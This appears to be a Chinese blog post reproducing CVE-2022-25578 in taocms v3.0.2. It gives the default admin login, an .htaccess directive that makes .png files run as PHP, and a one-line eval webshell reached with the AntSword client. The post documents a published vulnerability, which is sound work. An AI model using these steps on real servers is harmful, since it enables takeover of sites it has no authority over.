CVE-2022-25578
CVE-2022-25578
https://github.com/taogogo/taocms/issues/28
一、漏洞概述
taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码
二、知识点
1.什么是.htaccess文件:
htaccess文件(或者分布式配置文件),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制
2..htaccess文件的功能:
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
3.本漏洞的应用:
改变文件扩展名,我们需要在.htaccess文件末尾加上一下内容。
1 | AddType application/x-httpd-php .png |
三、漏洞复现
1.信息收集
搜索有关taocms的信息,发现默认登录密码,admin:tao,登入后台
2.寻找上传点
在文件管理处发现有个新建文件夹和上传功能,但是好像不能用,但是发现目录下有.htaccess文件和一些php文件,那就直接在.htaccess里添加内容:AddType application/x-httpd-php .png,在其中一个php文件中写入木马,如=eval($_POST[1])?>
3.蚁剑连接
添加URL地址,后面加上写了一句话木马的php文件,连接密码为1
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Echo!